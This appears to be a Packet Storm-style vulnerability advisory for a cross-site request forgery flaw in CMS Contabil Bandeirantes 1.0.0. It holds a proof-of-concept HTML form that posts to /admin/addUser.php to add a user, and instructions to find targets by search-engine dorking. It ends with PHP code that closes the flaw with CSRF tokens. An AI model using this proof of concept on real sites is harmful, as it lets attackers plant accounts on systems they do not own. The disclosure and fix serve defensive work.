
CMS Contabil Bandeirantes 1.0.0 Cross Site Request Forgery

CMS Contabil Bandeirantes version 1.0.0 suffers from a cross site request forgery vulnerability.

Packet Storm

======================================================================================================================================
| # Title : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |
| # Vendor : https://scriptmafia.org/ |
======================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] Go to line 12.

[+] Set the target site link, save changes and apply.

[+] Affected file : /admin/addUser.php

[+] Save code as poc.html

<section id="main" class="column" style="height: 680px;">

    <h4 class="alert_info">Necessário preencher todos os campos.</h4>  
    <!--<h4 class="alert_warning">A Warning Alert</h4>

    <h4 class="alert_error">An Error Message</h4>

    <h4 class="alert_success">A Success Message</h4>-->

    <article class="module width_full">  
  <form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">  
    <header><h3>Adicionar Usuários</h3></header>

                  <div class="module_content">  
            <fieldset>  
              <label>Nome</label>  
              <input name="nome" id="nome" value="" type="text">  
            </fieldset>  
            <fieldset>  
              <label>Email</label>  
              <input name="email" id="email" value="" type="text">  
            </fieldset>  
            <fieldset>  
              <label>Senha</label>  
              <input name="senha" id="senha" value="" type="text">  
            </fieldset>  
            <div class="clear"></div>  
        </div>    
    <footer>  
      <div class="submit_link">  
        <input id="limpar" name="limpar" value="limpar" type="submit">  
        <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">  
      </div>  
    </footer>  
  </form>    
</article><!-- end of post new article -->

                <div class="spacer"></div>  

</section>

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 9aylasdjroot.dzLiquidWormHussin-X*D4NB4R *ViRuS_Ra3cH yasMouh CraCkEr |
=======================================================================================================================================
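
The form above carries no per-session token, so nothing in the request distinguishes a submission from the admin panel from one sent by another origin. One way to close that gap, shown as an added example (not code from the advisory or the vendor): it assumes the admin panel authenticates with a PHP session cookie, and all function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; none of these names come from the CMS itself.

function start_admin_session(): void
{
    // SameSite=Strict keeps the session cookie off cross-site form posts.
    session_set_cookie_params([
        'httponly' => true,
        'samesite' => 'Strict',
        'secure'   => true, // assumes the admin panel is served over HTTPS
    ]);
    session_start();
}

function csrf_token(): string
{
    // One random token per session, embedded in every state-changing form.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    // Hidden input to print inside the <form> that posts to addUser.php.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function require_valid_csrf(array $post, array $session): void
{
    $sent   = $post['csrf_token'] ?? '';
    $stored = $session['csrf_token'] ?? '';
    // Reject missing tokens, non-string input, and mismatches (constant time).
    if (!is_string($sent) || !is_string($stored) || $stored === ''
        || !hash_equals($stored, $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// At the top of the handler, before nome/email/senha are read:
start_admin_session();
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    require_valid_csrf($_POST, $_SESSION);
    // ... existing user-creation logic runs only past this point ...
}
```

A page on another origin cannot read the session's token, so a form like poc.html is rejected with 403 before any user is created.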
